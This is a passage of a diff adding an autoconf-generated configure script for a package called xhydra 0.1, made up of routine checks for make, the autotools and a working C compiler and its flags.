"checking whether ${MAKE-make} sets \$(MAKE)... $ECHO_C" >&6 +set dummy ${MAKE-make}; ac_make=`echo "$2" | sed 'y,:./+-,___p_,'` +if eval "test \"\${ac_cv_prog_make_${ac_make}_set+set}\" = set"; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + cat >conftest.make <<\_ACEOF +all: + @echo 'ac_maketemp="$(MAKE)"' +_ACEOF +# GNU make sometimes prints "make[1]: Entering...", which would confuse us. +eval `${MAKE-make} -f conftest.make 2>/dev/null | grep temp=` +if test -n "$ac_maketemp"; then + eval ac_cv_prog_make_${ac_make}_set=yes +else + eval ac_cv_prog_make_${ac_make}_set=no +fi +rm -f conftest.make +fi +if eval "test \"`echo '$ac_cv_prog_make_'${ac_make}_set`\" = yes"; then + echo "$as_me:$LINENO: result: yes" >&5 +echo "${ECHO_T}yes" >&6 + SET_MAKE= +else + echo "$as_me:$LINENO: result: no" >&5 +echo "${ECHO_T}no" >&6 + SET_MAKE="MAKE=${MAKE-make}" +fi + + +PACKAGE=xhydra + +VERSION=0.1 + +if test "`cd $srcdir && pwd`" != "`pwd`" && test -f $srcdir/config.status; then + { { echo "$as_me:$LINENO: error: source directory already configured; run \"make distclean\" there first" >&5 +echo "$as_me: error: source directory already configured; run \"make distclean\" there first" >&2;} + { (exit 1); exit 1; }; } +fi + +cat >>confdefs.h <<_ACEOF +#define PACKAGE "$PACKAGE" +_ACEOF + + +cat >>confdefs.h <<_ACEOF +#define VERSION "$VERSION" +_ACEOF + + + +missing_dir=`cd $ac_aux_dir && pwd` +echo "$as_me:$LINENO: checking for working aclocal-${am__api_version}" >&5 +echo $ECHO_N "checking for working aclocal-${am__api_version}... $ECHO_C" >&6 +# Run test in a subshell; some versions of sh will print an error if +# an executable is not found, even if stderr is redirected. +# Redirect stdin to placate older versions of autoconf. Sigh. +if (aclocal-${am__api_version} --version) < /dev/null > /dev/null 2>&1; then + ACLOCAL=aclocal-${am__api_version} + echo "$as_me:$LINENO: result: found" >&5 +echo "${ECHO_T}found" >&6 +else + ACLOCAL="$missing_dir/missing aclocal-${am__api_version}" + echo "$as_me:$LINENO: result: missing" >&5 +echo "${ECHO_T}missing" >&6 +fi + +echo "$as_me:$LINENO: checking for working autoconf" >&5 +echo $ECHO_N "checking for working autoconf... $ECHO_C" >&6 +# Run test in a subshell; some versions of sh will print an error if +# an executable is not found, even if stderr is redirected. +# Redirect stdin to placate older versions of autoconf. Sigh. +if (autoconf --version) < /dev/null > /dev/null 2>&1; then + AUTOCONF=autoconf + echo "$as_me:$LINENO: result: found" >&5 +echo "${ECHO_T}found" >&6 +else + AUTOCONF="$missing_dir/missing autoconf" + echo "$as_me:$LINENO: result: missing" >&5 +echo "${ECHO_T}missing" >&6 +fi + +echo "$as_me:$LINENO: checking for working automake-${am__api_version}" >&5 +echo $ECHO_N "checking for working automake-${am__api_version}... $ECHO_C" >&6 +# Run test in a subshell; some versions of sh will print an error if +# an executable is not found, even if stderr is redirected. +# Redirect stdin to placate older versions of autoconf. Sigh. +if (automake-${am__api_version} --version) < /dev/null > /dev/null 2>&1; then + AUTOMAKE=automake-${am__api_version} + echo "$as_me:$LINENO: result: found" >&5 +echo "${ECHO_T}found" >&6 +else + AUTOMAKE="$missing_dir/missing automake-${am__api_version}" + echo "$as_me:$LINENO: result: missing" >&5 +echo "${ECHO_T}missing" >&6 +fi + +echo "$as_me:$LINENO: checking for working autoheader" >&5 +echo $ECHO_N "checking for working autoheader... $ECHO_C" >&6 +# Run test in a subshell; some versions of sh will print an error if +# an executable is not found, even if stderr is redirected. +# Redirect stdin to placate older versions of autoconf. Sigh. +if (autoheader --version) < /dev/null > /dev/null 2>&1; then + AUTOHEADER=autoheader + echo "$as_me:$LINENO: result: found" >&5 +echo "${ECHO_T}found" >&6 +else + AUTOHEADER="$missing_dir/missing autoheader" + echo "$as_me:$LINENO: result: missing" >&5 +echo "${ECHO_T}missing" >&6 +fi + +echo "$as_me:$LINENO: checking for working makeinfo" >&5 +echo $ECHO_N "checking for working makeinfo... $ECHO_C" >&6 +# Run test in a subshell; some versions of sh will print an error if +# an executable is not found, even if stderr is redirected. +# Redirect stdin to placate older versions of autoconf. Sigh. +if (makeinfo --version) < /dev/null > /dev/null 2>&1; then + MAKEINFO=makeinfo + echo "$as_me:$LINENO: result: found" >&5 +echo "${ECHO_T}found" >&6 +else + MAKEINFO="$missing_dir/missing makeinfo" + echo "$as_me:$LINENO: result: missing" >&5 +echo "${ECHO_T}missing" >&6 +fi + + + + ac_config_headers="$ac_config_headers config.h" + + ac_config_commands="$ac_config_commands default-1" + +echo "$as_me:$LINENO: checking whether to enable maintainer-specific portions of Makefiles" >&5 +echo $ECHO_N "checking whether to enable maintainer-specific portions of Makefiles... $ECHO_C" >&6 + # Check whether --enable-maintainer-mode or --disable-maintainer-mode was given. +if test "${enable_maintainer_mode+set}" = set; then + enableval="$enable_maintainer_mode" + USE_MAINTAINER_MODE=$enableval +else + USE_MAINTAINER_MODE=no +fi; + echo "$as_me:$LINENO: result: $USE_MAINTAINER_MODE" >&5 +echo "${ECHO_T}$USE_MAINTAINER_MODE" >&6 + + +if test $USE_MAINTAINER_MODE = yes; then + MAINTAINER_MODE_TRUE= + MAINTAINER_MODE_FALSE='#' +else + MAINTAINER_MODE_TRUE='#' + MAINTAINER_MODE_FALSE= +fi + MAINT=$MAINTAINER_MODE_TRUE + + + +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu +if test -n "$ac_tool_prefix"; then + # Extract the first word of "${ac_tool_prefix}gcc", so it can be a program name with args. +set dummy ${ac_tool_prefix}gcc; ac_word=$2 +echo "$as_me:$LINENO: checking for $ac_word" >&5 +echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6 +if test "${ac_cv_prog_CC+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if $as_executable_p "$as_dir/$ac_word$ac_exec_ext"; then + ac_cv_prog_CC="${ac_tool_prefix}gcc" + echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done +done + +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + echo "$as_me:$LINENO: result: $CC" >&5 +echo "${ECHO_T}$CC" >&6 +else + echo "$as_me:$LINENO: result: no" >&5 +echo "${ECHO_T}no" >&6 +fi + +fi +if test -z "$ac_cv_prog_CC"; then + ac_ct_CC=$CC + # Extract the first word of "gcc", so it can be a program name with args. +set dummy gcc; ac_word=$2 +echo "$as_me:$LINENO: checking for $ac_word" >&5 +echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6 +if test "${ac_cv_prog_ac_ct_CC+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + if test -n "$ac_ct_CC"; then + ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if $as_executable_p "$as_dir/$ac_word$ac_exec_ext"; then + ac_cv_prog_ac_ct_CC="gcc" + echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done +done + +fi +fi +ac_ct_CC=$ac_cv_prog_ac_ct_CC +if test -n "$ac_ct_CC"; then + echo "$as_me:$LINENO: result: $ac_ct_CC" >&5 +echo "${ECHO_T}$ac_ct_CC" >&6 +else + echo "$as_me:$LINENO: result: no" >&5 +echo "${ECHO_T}no" >&6 +fi + + CC=$ac_ct_CC +else + CC="$ac_cv_prog_CC" +fi + +if test -z "$CC"; then + if test -n "$ac_tool_prefix"; then + # Extract the first word of "${ac_tool_prefix}cc", so it can be a program name with args. +set dummy ${ac_tool_prefix}cc; ac_word=$2 +echo "$as_me:$LINENO: checking for $ac_word" >&5 +echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6 +if test "${ac_cv_prog_CC+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if $as_executable_p "$as_dir/$ac_word$ac_exec_ext"; then + ac_cv_prog_CC="${ac_tool_prefix}cc" + echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done +done + +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + echo "$as_me:$LINENO: result: $CC" >&5 +echo "${ECHO_T}$CC" >&6 +else + echo "$as_me:$LINENO: result: no" >&5 +echo "${ECHO_T}no" >&6 +fi + +fi +if test -z "$ac_cv_prog_CC"; then + ac_ct_CC=$CC + # Extract the first word of "cc", so it can be a program name with args. +set dummy cc; ac_word=$2 +echo "$as_me:$LINENO: checking for $ac_word" >&5 +echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6 +if test "${ac_cv_prog_ac_ct_CC+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + if test -n "$ac_ct_CC"; then + ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if $as_executable_p "$as_dir/$ac_word$ac_exec_ext"; then + ac_cv_prog_ac_ct_CC="cc" + echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done +done + +fi +fi +ac_ct_CC=$ac_cv_prog_ac_ct_CC +if test -n "$ac_ct_CC"; then + echo "$as_me:$LINENO: result: $ac_ct_CC" >&5 +echo "${ECHO_T}$ac_ct_CC" >&6 +else + echo "$as_me:$LINENO: result: no" >&5 +echo "${ECHO_T}no" >&6 +fi + + CC=$ac_ct_CC +else + CC="$ac_cv_prog_CC" +fi + +fi +if test -z "$CC"; then + # Extract the first word of "cc", so it can be a program name with args. +set dummy cc; ac_word=$2 +echo "$as_me:$LINENO: checking for $ac_word" >&5 +echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6 +if test "${ac_cv_prog_CC+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else + ac_prog_rejected=no +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if $as_executable_p "$as_dir/$ac_word$ac_exec_ext"; then + if test "$as_dir/$ac_word$ac_exec_ext" = "/usr/ucb/cc"; then + ac_prog_rejected=yes + continue + fi + ac_cv_prog_CC="cc" + echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done +done + +if test $ac_prog_rejected = yes; then + # We found a bogon in the path, so make sure we never use it. + set dummy $ac_cv_prog_CC + shift + if test $# != 0; then + # We chose a different compiler from the bogus one. + # However, it has the same basename, so the bogon will be chosen + # first if we set CC to just the basename; use the full file name. + shift + ac_cv_prog_CC="$as_dir/$ac_word${1+' '}$@" + fi +fi +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + echo "$as_me:$LINENO: result: $CC" >&5 +echo "${ECHO_T}$CC" >&6 +else + echo "$as_me:$LINENO: result: no" >&5 +echo "${ECHO_T}no" >&6 +fi + +fi +if test -z "$CC"; then + if test -n "$ac_tool_prefix"; then + for ac_prog in cl + do + # Extract the first word of "$ac_tool_prefix$ac_prog", so it can be a program name with args. +set dummy $ac_tool_prefix$ac_prog; ac_word=$2 +echo "$as_me:$LINENO: checking for $ac_word" >&5 +echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6 +if test "${ac_cv_prog_CC+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if $as_executable_p "$as_dir/$ac_word$ac_exec_ext"; then + ac_cv_prog_CC="$ac_tool_prefix$ac_prog" + echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done +done + +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + echo "$as_me:$LINENO: result: $CC" >&5 +echo "${ECHO_T}$CC" >&6 +else + echo "$as_me:$LINENO: result: no" >&5 +echo "${ECHO_T}no" >&6 +fi + + test -n "$CC" && break + done +fi +if test -z "$CC"; then + ac_ct_CC=$CC + for ac_prog in cl +do + # Extract the first word of "$ac_prog", so it can be a program name with args. +set dummy $ac_prog; ac_word=$2 +echo "$as_me:$LINENO: checking for $ac_word" >&5 +echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6 +if test "${ac_cv_prog_ac_ct_CC+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + if test -n "$ac_ct_CC"; then + ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if $as_executable_p "$as_dir/$ac_word$ac_exec_ext"; then + ac_cv_prog_ac_ct_CC="$ac_prog" + echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done +done + +fi +fi +ac_ct_CC=$ac_cv_prog_ac_ct_CC +if test -n "$ac_ct_CC"; then + echo "$as_me:$LINENO: result: $ac_ct_CC" >&5 +echo "${ECHO_T}$ac_ct_CC" >&6 +else + echo "$as_me:$LINENO: result: no" >&5 +echo "${ECHO_T}no" >&6 +fi + + test -n "$ac_ct_CC" && break +done + + CC=$ac_ct_CC +fi + +fi + + +test -z "$CC" && { { echo "$as_me:$LINENO: error: no acceptable C compiler found in \$PATH +See \`config.log' for more details." >&5 +echo "$as_me: error: no acceptable C compiler found in \$PATH +See \`config.log' for more details." >&2;} + { (exit 1); exit 1; }; } + +# Provide some information about the compiler. +echo "$as_me:$LINENO:" \ + "checking for C compiler version" >&5 +ac_compiler=`set X $ac_compile; echo $2` +{ (eval echo "$as_me:$LINENO: \"$ac_compiler --version &5\"") >&5 + (eval $ac_compiler --version &5) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } +{ (eval echo "$as_me:$LINENO: \"$ac_compiler -v &5\"") >&5 + (eval $ac_compiler -v &5) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } +{ (eval echo "$as_me:$LINENO: \"$ac_compiler -V &5\"") >&5 + (eval $ac_compiler -V &5) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } + +cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +ac_clean_files_save=$ac_clean_files +ac_clean_files="$ac_clean_files a.out a.exe b.out" +# Try to create an executable without -o first, disregard a.out. +# It will help us diagnose broken compilers, and finding out an intuition +# of exeext. +echo "$as_me:$LINENO: checking for C compiler default output file name" >&5 +echo $ECHO_N "checking for C compiler default output file name... $ECHO_C" >&6 +ac_link_default=`echo "$ac_link" | sed 's/ -o *conftest[^ ]*//'` +if { (eval echo "$as_me:$LINENO: \"$ac_link_default\"") >&5 + (eval $ac_link_default) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; then + # Find the output, starting from the most likely. This scheme is +# not robust to junk in `.', hence go to wildcards (a.*) only as a last +# resort. + +# Be careful to initialize this variable, since it used to be cached. +# Otherwise an old cache value of `no' led to `EXEEXT = no' in a Makefile. +ac_cv_exeext= +# b.out is created by i960 compilers. +for ac_file in a_out.exe a.exe conftest.exe a.out conftest a.* conftest.* b.out +do + test -f "$ac_file" || continue + case $ac_file in + *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.o | *.obj ) + ;; + conftest.$ac_ext ) + # This is the source file. + ;; + [ab].out ) + # We found the default executable, but exeext='' is most + # certainly right. + break;; + *.* ) + ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'` + # FIXME: I believe we export ac_cv_exeext for Libtool, + # but it would be cool to find out if it's true. Does anybody + # maintain Libtool? --akim. + export ac_cv_exeext + break;; + * ) + break;; + esac +done +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +{ { echo "$as_me:$LINENO: error: C compiler cannot create executables +See \`config.log' for more details." >&5 +echo "$as_me: error: C compiler cannot create executables +See \`config.log' for more details." >&2;} + { (exit 77); exit 77; }; } +fi + +ac_exeext=$ac_cv_exeext +echo "$as_me:$LINENO: result: $ac_file" >&5 +echo "${ECHO_T}$ac_file" >&6 + +# Check the compiler produces executables we can run. If not, either +# the compiler is broken, or we cross compile. +echo "$as_me:$LINENO: checking whether the C compiler works" >&5 +echo $ECHO_N "checking whether the C compiler works... $ECHO_C" >&6 +# FIXME: These cross compiler hacks should be removed for Autoconf 3.0 +# If not cross compiling, check that we can run a simple program. +if test "$cross_compiling" != yes; then + if { ac_try='./$ac_file' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; }; then + cross_compiling=no + else + if test "$cross_compiling" = maybe; then + cross_compiling=yes + else + { { echo "$as_me:$LINENO: error: cannot run C compiled programs. +If you meant to cross compile, use \`--host'. +See \`config.log' for more details." >&5 +echo "$as_me: error: cannot run C compiled programs. +If you meant to cross compile, use \`--host'. +See \`config.log' for more details." >&2;} + { (exit 1); exit 1; }; } + fi + fi +fi +echo "$as_me:$LINENO: result: yes" >&5 +echo "${ECHO_T}yes" >&6 + +rm -f a.out a.exe conftest$ac_cv_exeext b.out +ac_clean_files=$ac_clean_files_save +# Check the compiler produces executables we can run. If not, either +# the compiler is broken, or we cross compile. +echo "$as_me:$LINENO: checking whether we are cross compiling" >&5 +echo $ECHO_N "checking whether we are cross compiling... $ECHO_C" >&6 +echo "$as_me:$LINENO: result: $cross_compiling" >&5 +echo "${ECHO_T}$cross_compiling" >&6 + +echo "$as_me:$LINENO: checking for suffix of executables" >&5 +echo $ECHO_N "checking for suffix of executables... $ECHO_C" >&6 +if { (eval echo "$as_me:$LINENO: \"$ac_link\"") >&5 + (eval $ac_link) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; then + # If both `conftest.exe' and `conftest' are `present' (well, observable) +# catch `conftest.exe'. For instance with Cygwin, `ls conftest' will +# work properly (i.e., refer to `conftest.exe'), while it won't with +# `rm'. +for ac_file in conftest.exe conftest conftest.*; do + test -f "$ac_file" || continue + case $ac_file in + *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.o | *.obj ) ;; + *.* ) ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'` + export ac_cv_exeext + break;; + * ) break;; + esac +done +else + { { echo "$as_me:$LINENO: error: cannot compute suffix of executables: cannot compile and link +See \`config.log' for more details." >&5 +echo "$as_me: error: cannot compute suffix of executables: cannot compile and link +See \`config.log' for more details." >&2;} + { (exit 1); exit 1; }; } +fi + +rm -f conftest$ac_cv_exeext +echo "$as_me:$LINENO: result: $ac_cv_exeext" >&5 +echo "${ECHO_T}$ac_cv_exeext" >&6 + +rm -f conftest.$ac_ext +EXEEXT=$ac_cv_exeext +ac_exeext=$EXEEXT +echo "$as_me:$LINENO: checking for suffix of object files" >&5 +echo $ECHO_N "checking for suffix of object files... $ECHO_C" >&6 +if test "${ac_cv_objext+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +rm -f conftest.o conftest.obj +if { (eval echo "$as_me:$LINENO: \"$ac_compile\"") >&5 + (eval $ac_compile) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; then + for ac_file in `(ls conftest.o conftest.obj; ls conftest.*) 2>/dev/null`; do + case $ac_file in + *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg ) ;; + *) ac_cv_objext=`expr "$ac_file" : '.*\.\(.*\)'` + break;; + esac +done +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +{ { echo "$as_me:$LINENO: error: cannot compute suffix of object files: cannot compile +See \`config.log' for more details." >&5 +echo "$as_me: error: cannot compute suffix of object files: cannot compile +See \`config.log' for more details." >&2;} + { (exit 1); exit 1; }; } +fi + +rm -f conftest.$ac_cv_objext conftest.$ac_ext +fi +echo "$as_me:$LINENO: result: $ac_cv_objext" >&5 +echo "${ECHO_T}$ac_cv_objext" >&6 +OBJEXT=$ac_cv_objext +ac_objext=$OBJEXT +echo "$as_me:$LINENO: checking whether we are using the GNU C compiler" >&5 +echo $ECHO_N "checking whether we are using the GNU C compiler... $ECHO_C" >&6 +if test "${ac_cv_c_compiler_gnu+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ + +int +main () +{ +#ifndef __GNUC__ + choke me +#endif + + ; + return 0; +} +_ACEOF +rm -f conftest.$ac_objext +if { (eval echo "$as_me:$LINENO: \"$ac_compile\"") >&5 + (eval $ac_compile) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } && + { ac_try='test -z "$ac_c_werror_flag" + || test ! -s conftest.err' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; } && + { ac_try='test -s conftest.$ac_objext' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; }; then + ac_compiler_gnu=yes +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +ac_compiler_gnu=no +fi +rm -f conftest.err conftest.$ac_objext conftest.$ac_ext +ac_cv_c_compiler_gnu=$ac_compiler_gnu + +fi +echo "$as_me:$LINENO: result: $ac_cv_c_compiler_gnu" >&5 +echo "${ECHO_T}$ac_cv_c_compiler_gnu" >&6 +GCC=`test $ac_compiler_gnu = yes && echo yes` +ac_test_CFLAGS=${CFLAGS+set} +ac_save_CFLAGS=$CFLAGS +CFLAGS="-g" +echo "$as_me:$LINENO: checking whether $CC accepts -g" >&5 +echo $ECHO_N "checking whether $CC accepts -g... $ECHO_C" >&6 +if test "${ac_cv_prog_cc_g+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +rm -f conftest.$ac_objext +if { (eval echo "$as_me:$LINENO: \"$ac_compile\"") >&5 + (eval $ac_compile) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } && + { ac_try='test -z "$ac_c_werror_flag" + || test ! -s conftest.err' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; } && + { ac_try='test -s conftest.$ac_objext' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; }; then + ac_cv_prog_cc_g=yes +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +ac_cv_prog_cc_g=no +fi +rm -f conftest.err conftest.$ac_objext conftest.$ac_ext +fi +echo "$as_me:$LINENO: result: $ac_cv_prog_cc_g" >&5 +echo "${ECHO_T}$ac_cv_prog_cc_g" >&6 +if test "$ac_test_CFLAGS" = set; then + CFLAGS=$ac_save_CFLAGS +elif test $ac_cv_prog_cc_g = yes; then + if test "$GCC" = yes; then + CFLAGS="-g -O2" + else + CFLAGS="-g" + fi +else + if test "$GCC" = yes; then + CFLAGS="-O2" + else + CFLAGS= + fi +fi +echo "$as_me:$LINENO: checking for $CC option to accept ANSI C" >&5 +echo $ECHO_N "checking for $CC option to accept ANSI C... $ECHO_C" >&6 +if test "${ac_cv_prog_cc_stdc+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + ac_cv_prog_cc_stdc=no +ac_save_CC=$CC +cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ +#include +#include +#include +#include +/* Most of the following tests are stolen from RCS 5.7's src/conf.sh. */ +struct buf { int x; }; +FILE * (*rcsopen) (struct buf *, struct stat *, int); +static char *e (p, i) + char **p; + int i; +{ + return p[i]; +} +static char *f (char * (*g) (char **, int), char **p, ...) +{ + char *s; + va_list v; + va_start (v,p); + s = g (p, va_arg (v,int)); + va_end (v); + return s; +} + +/* OSF 4.0 Compaq cc is some sort of almost-ANSI by default. It has + function prototypes and stuff, but not '\xHH' hex character constants. + These don't provoke an error unfortunately, instead are silently treated + as 'x'. The following induces an error, until -std1 is added to get + proper ANSI mode. Curiously '\x00'!='x' always comes out true, for an + array size at least. It's necessary to write '\x00'==0 to get something + that's true only with -std1. */ +int osf4_cc_array ['\x00' == 0 ? 1 : -1]; + +int test (int i, double x); +struct s1 {int (*f) (int a);}; +struct s2 {int (*f) (double a);}; +int pairnames (int, char **, FILE *(*)(struct buf *, struct stat *, int), int, int); +int argc; +char **argv; +int +main () +{ +return f (e, argv, 0) != argv[0] || f (e, argv, 1) != argv[1]; + ; + return 0; +} +_ACEOF +# Don't try gcc -ansi; that turns off useful extensions and +# breaks some systems' header files. +# AIX -qlanglvl=ansi +# Ultrix and OSF/1 -std1 +# HP-UX 10.20 and later -Ae +# HP-UX older versions -Aa -D_HPUX_SOURCE +# SVR4 -Xc -D__EXTENSIONS__ +for ac_arg in "" -qlanglvl=ansi -std1 -Ae "-Aa -D_HPUX_SOURCE" "-Xc -D__EXTENSIONS__" +do + CC="$ac_save_CC $ac_arg" + rm -f conftest.$ac_objext +if { (eval echo "$as_me:$LINENO: \"$ac_compile\"") >&5 + (eval $ac_compile) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } && + { ac_try='test -z "$ac_c_werror_flag" + || test ! -s conftest.err' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; } && + { ac_try='test -s conftest.$ac_objext' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; }; then + ac_cv_prog_cc_stdc=$ac_arg +break +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +fi +rm -f conftest.err conftest.$ac_objext +done +rm -f conftest.$ac_ext conftest.$ac_objext +CC=$ac_save_CC + +fi + +case "x$ac_cv_prog_cc_stdc" in + x|xno) + echo "$as_me:$LINENO: result: none needed" >&5 +echo "${ECHO_T}none needed" >&6 ;; + *) + echo "$as_me:$LINENO: result: $ac_cv_prog_cc_stdc" >&5 +echo 